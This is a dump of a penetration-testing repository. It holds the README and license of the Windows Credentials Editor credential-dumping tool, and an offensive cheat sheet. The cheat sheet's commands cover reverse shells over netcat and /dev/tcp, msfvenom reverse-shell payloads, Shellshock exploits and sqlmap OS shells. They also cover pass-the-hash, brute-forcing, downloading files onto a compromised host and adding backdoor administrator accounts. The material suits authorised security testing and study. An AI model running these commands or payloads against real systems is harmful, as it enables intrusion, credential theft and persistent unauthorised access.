# IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL
# ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE
# THE SOFTWARE AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
# GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE
# OR INABILITY TO USE THE SOFTWARE (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR
# DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR
# A FAILURE OF THE SOFTWARE TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF SUCH
# HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
62 | 63 | # 64 | -------------------------------------------------------------------------------- /net/Windows/wce_v1_42beta_x32/README: -------------------------------------------------------------------------------- 1 | Windows Credentials Editor v1.42beta (32-bit) 2 | (c) 2010, 2011, 2012, 2013 Amplia Security, Hernan Ochoa 3 | written by: hernan@ampliasecurity.com 4 | http://www.ampliasecurity.com 5 | ------------------------------------------------------------- 6 | 7 | Abstract 8 | ---------- 9 | 10 | Windows Credentials Editor (WCE) v1.42beta allows you to 11 | 12 | NTLM authentication: 13 | 14 | * List logon sessions and add, change, list and delete associated credentials (e.g.: LM/NT hashes) 15 | * Perform pass-the-hash on Windows natively 16 | * Obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.) which can be 17 | used to authenticate to other systems. WCE can perform this task without injecting code, just by reading and decrypting information stored in Windows internal memory structures. It also has the capability to automatically switch to code injection when the aforementioned method cannot be performed 18 | 19 | Kerberos authentication: 20 | 21 | * Dump Kerberos tickets (including the TGT) stored in Windows machines 22 | * Reuse/Load those tickets on another Windows machines, to authenticate to other systems and services 23 | * Reuse/Load those tickets on *Unix machines, to authenticate to other systems and services 24 | 25 | Digest Authentication: 26 | 27 | * Obtain cleartext passwords entered by the user when logging into a Windows system, and stored by the Windows Digest Authentication security package 28 | 29 | 30 | Supported Platforms 31 | ------------------- 32 | Windows Credentials Editor supports Windows XP, 2003, Vista, 7, 2008 and 8. 
33 | 34 | 35 | Requirements 36 | ------------- 37 | This tool requires administrator privileges to dump and add/delete/change NTLM credentials, and to dump cleartext passwords stored by the Windows Digest Authentication security package. 38 | 39 | Kerberos tickets can be obtained as a normal user although administrator privileges might be required to obtain session keys depending on the system's configuration. 40 | 41 | Please remember this is an attack and post-exploitation tool. 42 | 43 | Options 44 | -------- 45 | Windows Credentials Editor provides the following options: 46 | 47 | Options: 48 | -l List logon sessions and NTLM credentials (default). 49 | -s Changes NTLM credentials of current logon session. 50 | Parameters: :::. 51 | -r Lists logon sessions and NTLM credentials indefinitely. 52 | Refreshes every 5 seconds if new sessions are found. 53 | Optional: -r. 54 | -c Run in a new session with the specified NTLM credentials. 55 | Parameters: . 56 | -e Lists logon sessions NTLM credentials indefinitely. 57 | Refreshes every time a logon event occurs. 58 | -o saves all output to a file. 59 | Parameters: . 60 | -i Specify LUID instead of use current logon session. 61 | Parameters: . 62 | -d Delete NTLM credentials from logon session. 63 | Parameters: . 64 | -a Use Addresses. 65 | Parameters: 66 | -f Force 'safe mode'. 67 | -g Generate LM & NT Hash. 68 | Parameters: . 69 | -K Dump Kerberos tickets to file (unix & 'windows wce' form 70 | at) 71 | -k Read Kerberos tickets from file and insert into Windows 72 | cache 73 | -w Dump cleartext passwords stored by the digest authentication package 74 | -v verbose output. 75 | 76 | Examples: 77 | 78 | * List current logon sessions 79 | 80 | C:\>wce -l 81 | WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com) 82 | Use -h for help. 
meme:meme:11111111111111111111111111111111:11111111111111111111111111111111

* List current logon sessions with verbose output enabled

C:\>wce -l -v
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Current Logon Session LUID: 00064081h
Logon Sessions Found: 8
WIN-REK2HG6EBIS\auser:NTLM
LUID:0006409Fh
WIN-REK2HG6EBIS\auser:NTLM
LUID:00064081h
NT AUTHORITY\ANONYMOUS LOGON:NTLM
LUID:00019137h
NT AUTHORITY\IUSR:Negotiate
LUID:000003E3h
NT AUTHORITY\LOCAL SERVICE:Negotiate
LUID:000003E5h
WORKGROUP\WIN-REK2HG6EBIS$:Negotiate
LUID:000003E4h
\:NTLM
LUID:0000916Ah
WORKGROUP\WIN-REK2HG6EBIS$:NTLM
LUID:000003E7h

00064081:meme:meme:11111111111111111111111111111111:11111111111111111111111111111111

* Change NTLM credentials associated with current logon session

C:\>wce -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Changing NTLM credentials of current logon session (00064081h) to:
Username: auser
domain: admin
LMHash: 99999999999999999999999999999999
NTHash: 99999999999999999999999999999999
NTLM credentials successfully changed!

* Add/Change NTLM credentials of a logon session (not the current one)

C:\>wce -i 3e5 -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Changing NTLM credentials of logon session 000003E5h to:
Username: auser
domain: admin
LMHash: 99999999999999999999999999999999
NTHash: 99999999999999999999999999999999
NTLM credentials successfully changed!

* Delete NTLM credentials associated with a logon session

C:\>wce -d 3e5
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

NTLM credentials successfully deleted!

* Run WCE indefinitely, waiting for new credentials/logon sessions.
Refresh is performed every time a logon event is registered in the Event Log.

C:\>wce -e

* Run WCE indefinitely, waiting for new credentials/logon sessions.
Refresh is every 5 seconds by default.

C:\>wce -r

* Run WCE indefinitely, waiting for new credentials/logon sessions, but refresh every 1 second (by default wce refreshes every 5 seconds)

C:\>wce -r5


* Generate LM & NT Hash.

C:\>wce -g test
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Password: test
Hashes: 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537

* Dump Kerberos tickets to file (unix & 'windows wce' format)

C:\>wce -K
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Converting and saving TGT in UNIX format to file wce_ccache...
Converting and saving tickets in Windows WCE Format to file wce_krbtkts..
5 kerberos tickets saved to file 'wce_ccache'.
5 kerberos tickets saved to file 'wce_krbtkts'.
Done!

* Read Kerberos tickets from file and insert into Windows cache

C:\>wce -k
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Reading kerberos tickets from file 'wce_krbtkts'...
5 kerberos tickets were added to the cache.
Done!

* Dump cleartext passwords stored by the Digest Authentication package

C:\>wce -w
WCE v1.42beta (Windows Credentials Editor) - (c) 2010,2011,2012,2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

test\MYDOMAIN:mypass1234
NETWORK SERVICE\WORKGROUP:test



GETLSASRVADDR.EXE
-----------------
This tool can be used to automatically obtain the addresses WCE needs
in order to read logon sessions and NTLM credentials from memory.

The addresses obtained can then be passed to WCE with the -A switch.

This tool requires the DLLs symsrv.dll and dbghelp.dll, available from the
"Debugging Tools for Windows" package.
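The `wce -g test` example above prints the LM and NT hashes of the password `test`. The Python below is an added illustration, not WCE's code and not part of this repository: it recomputes the NT hash with a pure-Python MD4 over the UTF-16LE password (no salt, no iteration, which is why a stolen NT hash can be replayed as-is in pass-the-hash), and classifies an LM hash by its constant "empty half" so an auditor can recognise short passwords and LM storage that is still enabled. The function and constant names (`md4`, `nt_hash`, `classify_lm_hash`, `LM_EMPTY_HALF`) are mine.

```python
# Added example (not part of WCE or this repository): recompute the NT hash
# that `wce -g test` prints and classify the LM hash printed next to it.
import struct

_MASK = 0xFFFFFFFF

# Second half of every LM hash whose password is 7 characters or shorter:
# DES of "KGS!@#$%" under a key of seven NUL bytes. Well-known constant value.
LM_EMPTY_HALF = "AAD3B435B51404EE"


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data):
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often unavailable with OpenSSL 3."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    bit_len = len(data) * 8
    data = data + b"\x80"
    data += b"\x00" * ((56 - len(data) % 64) % 64)
    data += struct.pack("<Q", bit_len)
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        # Each round is 16 steps; rotating (a, b, c, d) after every step
        # reproduces the ABCD / DABC / CDAB / BCDA pattern of the RFC.
        for i in range(16):  # round 1, F(b, c, d) = (b & c) | (~b & d)
            f = (b & c) | (~b & d)
            a = _rotl((a + f + x[i]) & _MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2, G = majority(b, c, d), words 0,4,8,12,1,5,...
            g = (b & c) | (b & d) | (c & d)
            k = (i % 4) * 4 + i // 4
            a = _rotl((a + g + x[k] + 0x5A827999) & _MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3, H = b ^ c ^ d
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = _rotl((a + (b ^ c ^ d) + x[k] + 0x6ED9EBA1) & _MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a0, b0, c0, d0 = ((a0 + a) & _MASK, (b0 + b) & _MASK,
                          (c0 + c) & _MASK, (d0 + d) & _MASK)
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password):
    """NT hash = MD4 over the UTF-16LE password. No salt and no iteration, so the
    stored hash is itself the credential that pass-the-hash replays."""
    return md4(password.encode("utf-16-le")).hex().upper()


def classify_lm_hash(lm_hex):
    """Audit verdict for a 32-hex-char LM hash such as the one `wce -g` prints."""
    first, second = lm_hex.upper()[:16], lm_hex.upper()[16:]
    if first == LM_EMPTY_HALF and second == LM_EMPTY_HALF:
        return "no LM hash stored (LM storage disabled or empty password)"
    if second == LM_EMPTY_HALF:
        return "LM hash stored, password is at most 7 characters"
    return "LM hash stored, password is 8 to 14 characters (two independently crackable halves)"


if __name__ == "__main__":
    # Values taken from the `wce -g test` example in the README above.
    print(nt_hash("test"))  # 0CB6948805F797BF2A82807973B89537
    print(classify_lm_hash("01FC5A6BE7BC6929AAD3B435B51404EE"))
```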
Additional Information
----------------------

* http://www.ampliasecurity.com/research.html
* http://www.ampliasecurity.com/research/wcefaq.html
* http://www.ampliasecurity.com/research/WCE_Internals_RootedCon2011_ampliasecurity.pdf
* http://www.ampliasecurity.com/research/wce12_uba_ampliasecurity_eng.pdf


-------------------------------------------------------------------------------- /net/Windows/wce_v1_42beta_x32/getlsasrvaddr.exe: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/wce_v1_42beta_x32/getlsasrvaddr.exe
-------------------------------------------------------------------------------- /net/Windows/wce_v1_42beta_x32/wce.exe: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/wce_v1_42beta_x32/wce.exe
-------------------------------------------------------------------------------- /net/Windows/wce_v1_42beta_x64/Changelog: --------------------------------------------------------------------------------
Changelog for Windows Credentials Editor (WCE) 64-bit

version 1.42beta:
Nov 11, 2013
-Bug fixes
-Improved support for unicode, cleartext passwords with special characters dumped with the -w switch
-Improved 'safe mode'. No code injection needed.

version 1.41beta:
July 13, 2013
-Compiled with VS2010 because VS2012 breaks compatibility
with Windows 2008, XP and other previous versions of Windows.

version 1.4beta:
May 30, 2013
-Several bug fixes
-Windows 8 Support

-------------------------------------------------------------------------------- /net/Windows/wce_v1_42beta_x64/LICENSE.txt: --------------------------------------------------------------------------------
# Copyright (c) 2010,2011,2012,2013 Hernan Ochoa and Amplia Security.
# All rights reserved.
#
# Unless you have express written permission from the Copyright Holder, any
# use of or distribution of this software or portions of it, including, but not
# limited to, reimplementations, modifications and derived work of it, in
# either source code or any other form, as well as any other software using or
# referencing it in any way, may NOT be sold for commercial gain, must be
# covered by this very same license, and must retain this copyright notice and
# this license.
# Neither the name of the Copyright Holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THERE IS NO WARRANTY FOR THE SOFTWARE, TO THE EXTENT PERMITTED BY APPLICABLE
# LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR
# OTHER PARTIES PROVIDE THE SOFTWARE "AS IS" WITHOUT WARRANTY OF ANY KIND,
# EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE
# ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE SOFTWARE IS WITH YOU.
# SHOULD THE SOFTWARE PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY
# SERVICING, REPAIR OR CORRECTION.
#
# IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL
# ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE
# THE SOFTWARE AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
# GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE
# OR INABILITY TO USE THE SOFTWARE (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR
# DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR
# A FAILURE OF THE SOFTWARE TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF SUCH
# HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
#
-------------------------------------------------------------------------------- /net/Windows/wce_v1_42beta_x64/README: --------------------------------------------------------------------------------
Windows Credentials Editor v1.42beta (64-bit)
(c) 2010, 2011, 2012, 2013 Amplia Security, Hernan Ochoa
written by: hernan@ampliasecurity.com
http://www.ampliasecurity.com
-------------------------------------------------------------

Abstract
----------

Windows Credentials Editor (WCE) v1.42beta allows you to

NTLM authentication:

* List logon sessions and add, change, list and delete associated credentials (e.g.: LM/NT hashes)
* Perform pass-the-hash on Windows natively
* Obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.) which can be used to authenticate to other systems. WCE can perform this task without injecting code, just by reading and decrypting information stored in Windows internal memory structures.
It also has the capability to automatically switch to code injection when the aforementioned method cannot be performed.

Kerberos authentication:

* Dump Kerberos tickets (including the TGT) stored in Windows machines
* Reuse/Load those tickets on other Windows machines, to authenticate to other systems and services
* Reuse/Load those tickets on *Unix machines, to authenticate to other systems and services

Digest Authentication:

* Obtain cleartext passwords entered by the user when logging into a Windows system, and stored by the Windows Digest Authentication security package


Supported Platforms
-------------------
Windows Credentials Editor supports Windows XP, 2003, Vista, 7, 2008 and 8.


Requirements
-------------
This tool requires administrator privileges to dump and add/delete/change NTLM credentials, and to dump cleartext passwords stored by the Windows Digest Authentication security package.

Kerberos tickets can be obtained as a normal user, although administrator privileges might be required to obtain session keys, depending on the system's configuration.

Please remember this is an attack and post-exploitation tool.

Options
--------
Windows Credentials Editor provides the following options:

Options:
  -l   List logon sessions and NTLM credentials (default).
  -s   Changes NTLM credentials of current logon session.
       Parameters: :::.
  -r   Lists logon sessions and NTLM credentials indefinitely.
       Refreshes every 5 seconds if new sessions are found.
       Optional: -r.
  -c   Run in a new session with the specified NTLM credentials.
       Parameters: .
  -e   Lists logon sessions and NTLM credentials indefinitely.
       Refreshes every time a logon event occurs.
  -o   Saves all output to a file.
       Parameters: .
  -i   Specify a LUID instead of using the current logon session.
       Parameters: .
  -d   Delete NTLM credentials from logon session.
       Parameters: .
  -a   Use Addresses.
       Parameters:
  -f   Force 'safe mode'.
  -g   Generate LM & NT Hash.
       Parameters: .
  -K   Dump Kerberos tickets to file (unix & 'windows wce' format)
  -k   Read Kerberos tickets from file and insert into Windows cache
  -w   Dump cleartext passwords stored by the digest authentication package
  -v   Verbose output.

Examples:

* List current logon sessions

C:\>wce -l
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

meme:meme:11111111111111111111111111111111:11111111111111111111111111111111

* List current logon sessions with verbose output enabled

C:\>wce -l -v
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Current Logon Session LUID: 00064081h
Logon Sessions Found: 8
WIN-REK2HG6EBIS\auser:NTLM
LUID:0006409Fh
WIN-REK2HG6EBIS\auser:NTLM
LUID:00064081h
NT AUTHORITY\ANONYMOUS LOGON:NTLM
LUID:00019137h
NT AUTHORITY\IUSR:Negotiate
LUID:000003E3h
NT AUTHORITY\LOCAL SERVICE:Negotiate
LUID:000003E5h
WORKGROUP\WIN-REK2HG6EBIS$:Negotiate
LUID:000003E4h
\:NTLM
LUID:0000916Ah
WORKGROUP\WIN-REK2HG6EBIS$:NTLM
LUID:000003E7h

00064081:meme:meme:11111111111111111111111111111111:11111111111111111111111111111111

* Change NTLM credentials associated with current logon session

C:\>wce -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Changing NTLM credentials of current logon session (00064081h) to:
Username: auser
domain: admin
LMHash: 99999999999999999999999999999999
NTHash: 99999999999999999999999999999999
NTLM credentials successfully changed!

* Add/Change NTLM credentials of a logon session (not the current one)

C:\>wce -i 3e5 -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Changing NTLM credentials of logon session 000003E5h to:
Username: auser
domain: admin
LMHash: 99999999999999999999999999999999
NTHash: 99999999999999999999999999999999
NTLM credentials successfully changed!

* Delete NTLM credentials associated with a logon session

C:\>wce -d 3e5
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

NTLM credentials successfully deleted!

* Run WCE indefinitely, waiting for new credentials/logon sessions.
Refresh is performed every time a logon event is registered in the Event Log.

C:\>wce -e

* Run WCE indefinitely, waiting for new credentials/logon sessions.
Refresh is every 5 seconds by default.

C:\>wce -r

* Run WCE indefinitely, waiting for new credentials/logon sessions, but refresh every 1 second (by default wce refreshes every 5 seconds)

C:\>wce -r5


* Generate LM & NT Hash.

C:\>wce -g test
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Password: test
Hashes: 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537

* Dump Kerberos tickets to file (unix & 'windows wce' format)

C:\>wce -K
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Converting and saving TGT in UNIX format to file wce_ccache...
Converting and saving tickets in Windows WCE Format to file wce_krbtkts..
5 kerberos tickets saved to file 'wce_ccache'.
5 kerberos tickets saved to file 'wce_krbtkts'.
Done!

* Read Kerberos tickets from file and insert into Windows cache

C:\>wce -k
WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Reading kerberos tickets from file 'wce_krbtkts'...
5 kerberos tickets were added to the cache.
Done!

* Dump cleartext passwords stored by the Digest Authentication package

C:\>wce -w
WCE v1.42beta (Windows Credentials Editor) - (c) 2010,2011,2012,2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

test\MYDOMAIN:mypass1234
NETWORK SERVICE\WORKGROUP:test


Additional Information
----------------------

* http://www.ampliasecurity.com/research.html
* http://www.ampliasecurity.com/research/wcefaq.html
* http://www.ampliasecurity.com/research/WCE_Internals_RootedCon2011_ampliasecurity.pdf
* http://www.ampliasecurity.com/research/wce12_uba_ampliasecurity_eng.pdf


-------------------------------------------------------------------------------- /net/Windows/wce_v1_42beta_x64/wce.exe: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/wce_v1_42beta_x64/wce.exe
-------------------------------------------------------------------------------- /net/Windows/wget.exe: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/wget.exe
-------------------------------------------------------------------------------- /net/Windows/whoami.exe: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/juliocesarfort/pentesting-dump/d20259cc2f98a7a380033c59c1248845d58054e9/net/Windows/whoami.exe
-------------------------------------------------------------------------------- /net/help.md: --------------------------------------------------------------------------------
Infrastructure help
=======

* [Infrastructure help](#infrastructure-help)
  * [Enumeration](#enumeration)
    * [Arp Scan](#arp-scan)
    * [Ping Sweep](#ping-sweep)
    * [Port Scan](#port-scan)
    * [Web](#web)
    * [SMB](#smb)
    * [SNMP](#snmp)
    * [NSE scripts](#nse-scripts)
  * [Exploitation](#exploitation)
    * [Compiling exploits](#compiling-exploits)
    * [Binaries/shellcode](#binariesshellcode)
    * [SQL Injection](#sql-injection)
    * [Shellshock](#shellshock)
  * [Password attacks](#password-attacks)
    * [Bruteforce or dictionary](#bruteforce-or-dictionary)
    * [Password / hash dump](#password--hash-dump)
    * [Pass the hash](#pass-the-hash)
  * [Post Exploitation](#post-exploitation)
    * [Reverse shells](#reverse-shells)
    * [File transfer](#file-transfer)
    * [Add User](#add-user)
  * [Privilege Escalation](#privilege-escalation)
    * [Windows](#windows)
    * [Linux](#linux)
  * [Tunneling](#tunneling)
    * [Remote Port Forward (HOST A - KALI, HOST B - COMPROMISED, HOST C - TARGET )](#remote-port-forward-host-a---kali-host-b---compromised-host-c---target-)
    * [Proxychains](#proxychains)
    * [Local SSH Port Forward](#local-ssh-port-forward)


## Enumeration

### Arp Scan
```bash
netdiscover -i eth1 -r
arp -a -i eth1
```

### Ping Sweep

Bash
```bash
for ip in $(seq 1 254); do ping -c 1 192.168.0.$ip | grep "bytes from" | cut -d" " -f4 | cut -d":" -f1; done
```
TODO Windows/PS, Python

### Port Scan

TCP
```bash
nmap -v -sS -sV -Pn -n -p-
```

UDP
```bash
nmap -v -sU -Pn -n --top-ports=25
```

Netcat traditional
```bash
nc -v -n -z -w1 1-10000
```

Netcat OpenBSD
```bash
nc -v -n -z -w1 > 1-10000 2>&1 | grep succeed
```

### Web
Looking for common vulns
```bash
nmap -sV -Pn -v -p --script http-vuln*
```

Dirbusting
```bash
dirb http:/// /usr/share/dirb/wordlists/big.txt -S -r -w
```

### SMB
```bash
enum4linux -v -a
```

```bash
nmap -sV -Pn -vv -p --script=smb-check-vulns,smb-psexec,smb-vuln-ms10-054,smb-vuln-ms10-061 --script-args=unsafe=1
```


### SNMP
```bash
snmpcheck -t
```

### NSE scripts
```bash
ls /usr/share/nmap/scripts/ -l | grep
```
* smb*
* http*

### tcpdump
```bash
sudo tcpdump -i eth0 -nq -s0 -C100 -w audit_`date +"%Y%m%d_%H%M%S"`.pcap
```

## Exploitation

### Compiling exploits

Compiling on Windows
```bash
gcc -m32 -ggdb -o -fno-stack-protector -mpreferred-stack-boundary=2 -z execstack .c
```
Compiling on Linux
```bash
gcc .c -o -lssl -lcrypt
```
Compiling Windows flavored C on Linux (note missing libraries)
```bash
i586-mingw32msvc-gcc .c -o .exe -lwsock32 -lrpcrt4 -lmpr -lws2_32
```


### Binaries/shellcode

Msfvenom
```bash
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f exe -e x86/shikata_ga_nai -a x86 --platform win -b "\x00" > winreverseshell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -e x86/shikata_ga_nai -a x86 --platform win -b "\x00" > winrmeterpretershell.exe
```

Metasploit Listener
```
use exploit/multi/handler
set PAYLOAD
set LHOST
set LPORT
set ExitOnSession false
exploit -j -z
```

Meterpreter reminders
```
msfdb init
show options advanced
set ExitOnSession false
set AutoRunScript persistence
```

### SQL Injection
```bash
sqlmap -u "http:///index.php" --data="username=admin&password=admin&Submit=Login+In" --level=5 --risk=3 --time-sec 10 --dbms=mysql --os-shell
```

### Shellshock
```bash
curl -A '() { :;}; echo -en "\r\n\r\n$(echo;/usr/bin/id)\r\n\r\n"' :/cgi-bin/vuln.cgi
curl -i -X OPTIONS -H "User-Agent: () { :;};echo;/usr/bin/id" "http://:/cgi-bin/vuln.cgi"
ssh noob@ '() { :;}; uname -a'
```



## Password attacks

### Bruteforce or dictionary
LM
```bash
rcracki_mt -h
```

Hydra
```bash
hydra -V -u -o found-ftp.txt -e nsr -L wordlists/users.txt -P wordlists/passwords.txt -s 21 ftp

hydra -V -u -o found-ssh.txt -e nsr -L wordlists/users.txt -P wordlists/passwords.txt -s 22 ssh

hydra -V -u -o found-telnet.txt -e nsr -L wordlists/users.txt -P wordlists/passwords.txt -s 23 telnet

hydra -V -u -o found-snmp.txt -e nsr -P wordlists/snmp.txt snmp
```

John
```bash
john --rules --wordlist=/usr/share/wordlists/rockyou.txt --format=
```

Unshadow
```bash
unshadow /etc/passwd /etc/shadow > unshadowed
```

Hash id (https://github.com/psypanda/hashID)
```bash
hashid.py -j
```

### Password / hash dump
```
wce -w
PwDump7.exe
```

### Pass the hash
```
pth-winexe -U bob%254095eef2e2be31f7a83d6fb4b9887b:0d3f32016ee8a42ba768d558875d57e5 // cmd
```


## Post Exploitation

### Reverse shells
Netcat
```
nc -nv -e /bin/bash
nc -nv -e cmd.exe
```

Bash
```
/bin/bash -i >& /dev/tcp// 0>&1
```

Improve Linux feedback on shell
```
python -c 'import pty; pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i
```

### File transfer

FTP
```
echo open > ftp.txt
echo >> ftp.txt
echo >> ftp.txt
echo bin >> ftp.txt
echo get nc.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt
```

Powershell
```
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "http:///accesschk.exe" >> wget.ps1
echo $file = "accesschk.exe" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
```


### Add User
Windows
```
net user hacker MNB00zxc /add
net localgroup administrators hacker /add
```
Linux
```
/usr/sbin/useradd -g 0 -m -o -u 0 hacker
echo "hacker:123456qwe" | /usr/sbin/chpasswd
```


## Privilege Escalation

### Windows
Find misconfigured services
```bash
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
```

Find all weak folder permissions per drive.
```bash
accesschk.exe /accepteula -uwdqs Users c:\
accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\
```

Find all weak file permissions per drive.
```bash
accesschk.exe /accepteula -uwqs Users c:\*.*
accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.*
```

### Linux
Find, starting at root (/), SGID or SUID files that are not symbolic links, only 3 folders deep; list them with more detail and hide any errors (e.g. permission denied). The SGID/SUID test is grouped in parentheses so that `! -type l` and `-exec` apply to both branches of the `-o`, and `-maxdepth` comes first because `find` expects it before other tests.
```bash
find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null
```

Find passwords in files
```bash
grep -i -r "password" /**/*.php 2>/dev/null
find . -name "*.php" -print0 | xargs -0 grep -i -n "password" 2>/dev/null
```
Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here
```
find / -perm -1000 -type d 2>/dev/null
```

SGID (chmod 2000) - run as the group, not the user who started it
```
find / -perm -g=s -type f 2>/dev/null
```

SUID (chmod 4000) - run as the owner, not the user who started it
```
find / -perm -u=s -type f 2>/dev/null
```

SGID or SUID (grouped so that `-type f` applies to both)
```
find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null
```

Sudo list permissions
```bash
sudo -l
```


## Tunneling

### Remote Port Forward (HOST A - KALI, HOST B - COMPROMISED, HOST C - TARGET )
```
COMPROMISED > plink.exe KALI -P 22 -l root -pw rootpass -C -R 3389:TARGET:3389
```

### Proxychains
```
ssh -D -p hacker@COMPROMISED

proxychains
```

### Local SSH Port Forward
```
ssh -L :: hacker@COMPROMISED
```
-------------------------------------------------------------------------------- /snippets/android/help.md: --------------------------------------------------------------------------------
```bash
adb shell pm list packages
adb shell pm clear my.wonderful.app.package
```
* http://forum.xda-developers.com/showthread.php?t=2528952
